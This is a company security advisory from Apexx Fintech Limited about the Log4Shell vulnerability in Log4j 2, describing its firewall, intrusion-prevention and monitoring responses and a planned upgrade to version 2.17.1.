General overview

The vulnerability, tracked as CVE-2021-44228 and referred to as “Log4Shell,” affects Java-based applications that use Log4j 2 versions 2.0 through 2.14.1. Log4j 2 is a Java-based logging library that is widely used in business system development, included in various open-source libraries, and directly embedded in major software applications. CVE-2021-44228, dubbed Log4Shell, could allow an attacker to control log messages or log message parameters, and execute arbitrary code when message lookup substitution is enabled.

 

APEXX response

As soon as Apexx Fintech Limited has learned about this vulnerability, a full analysis of hosted systems and applications was performed against the recently published CVE-2021-44228, Log4j Zero day Vulnerability and the following actions have been undertaken: 


Mitigating controls:

  • Web Application firewall ruleset was updated.

  • Intrusion Prevention Systems signature was updated.

  • Heightened real time security monitoring on a 24x7 basis on this specific exploit.  

  • Engagement with all critical Third Party Service Providers and assessing their response and mitigation controls to these events.


Remediating controls:

In addition, as part of the final remediation, APEXX is currently working on the 2.17.1 upgrade for permanent protection against CVE-2021-44228 ,CVE-2021-45046,CVE-2021-4104CVE-2021-42550 ,CVE-2021-4510 and CVE-2021-44832Once our applications are fully tested with this recommended version, the rollout will be performed as per our change control process. 


Impact:

There was no impact to the Security, Confidentiality, Integrity of our services and has not experienced any degradation in Availability of services as a result of this vulnerability. Therefore, we confirm that appropriate precautionary steps have been undertaken to keep our customers safe and protected.